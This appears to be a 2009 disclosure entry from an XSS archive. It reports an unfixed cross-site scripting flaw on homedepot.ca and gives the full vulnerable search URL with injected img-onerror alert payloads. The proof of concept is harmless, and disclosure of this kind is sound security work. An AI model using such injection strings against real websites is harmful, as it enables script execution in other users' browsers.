Security researcher PaPPy, has submitted on 12/01/2009 a cross-site-scripting (XSS) vulnerability affecting www.homedepot.ca, which at the time of submission ranked 11166 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Vulnerable URL: http://www.homedepot.ca/webapp/wcs/stores/servlet/CatalogSearchResultView?storeId=10051&catalogId=10051&langId=-15&N=0&Ntk=level1&Ntt="><img src=x onerror="alert(1)";>&Nty=1&D="><img src=xonerror="alert(1)";>&Ntx=mode+matchallpartial&Dx=mode+matchallpartial&s=true